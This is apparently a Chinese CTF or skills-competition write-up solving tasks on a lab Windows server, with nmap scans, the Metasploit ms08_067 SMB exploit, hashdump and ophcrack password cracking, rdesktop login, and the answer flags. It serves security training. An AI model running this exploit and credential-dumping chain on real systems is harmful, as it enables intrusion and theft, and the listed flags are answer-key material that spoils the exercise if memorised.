1.通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行操作系统扫描渗透测试,并将该操作显示结果“Running:”之后的字符串作为FLAG提交;
使用命令nmap -O 172.16.1.12进行操作系统服务扫描,根据回显结果显示,提交Running后面的字符串Microsoft Windows XP|2003
Flag:Microsoft Windows XP|2003
2.通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行系统服务及版本扫描渗透测试,并将该操作显示结果中445端口对应的服务版本信息字符串作为FLAG提交;
使用命令nmap -sV 172.16.1.12对靶机操作系统进行系统服务及服务版本信息扫描渗透测试
Flag:Microsoft Windows XP Microsoft-ds
第三步,使用命令msfconsole启动metasplopit渗透测试平台
然后在交互界面使用命令
search ms08_067搜索smb漏洞利用模块
使用命令use exploit/windows/smb/ms08_067对该模块进行调用,然后使用命令show options查看需要配置的参数
使用命令set RHOST 172.16.1.12设置远程靶机地址,然后使用命令exploit对该模块进行利用
成功获取靶机的shell,第四步,使用命令run getgui -e启动目标靶机的远程桌面服务
然后使用命令hashdump导出当前管理员用户的NTLM hash值
复制Administrator管理员的那一行,再然后打开一个新的窗口使用命令ophcrack运行hash密码破解软件
将管理员的hash密文粘贴到该文本框内,然后点击OK,
导入成功后点击菜单栏中的Crack按钮,对该密文进行解密
稍等半分钟,成功解密管理员的明文密码pan123yun456
第五步,回到命令终端,使用命令rdesktop 172.16.1.12 运行远程桌面,输入用户名Administrator密码pan123yun456
成功进入桌面
3.通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景网络连接信息中的DNS信息作为FLAG提交;(例如114.114.114.114)
DNS信息如下
Flag:123.125.81.6
4.通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文件名称作为FLAG提交;
Flag:ksxwob.docx
5.通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文档内容作为FLAG提交; 其内容为
Flag:ytgzksel
6.通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景桌面上222文件夹中唯一一个图片中的英文单词作为FLAG提交;
Flag:eternity
7.通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景中的当前最高账户管理员的密码作为FLAG提交;
管理员的密码:pan123yun456
Flag: pan123yun456
8.通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景中回收站内文件的文档内容作为FLAG提交。
Flag:ncuiwerx
392
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
